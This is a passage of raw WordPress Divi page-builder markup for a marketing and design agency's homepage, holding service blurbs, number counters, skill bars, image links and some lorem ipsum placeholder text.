animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" 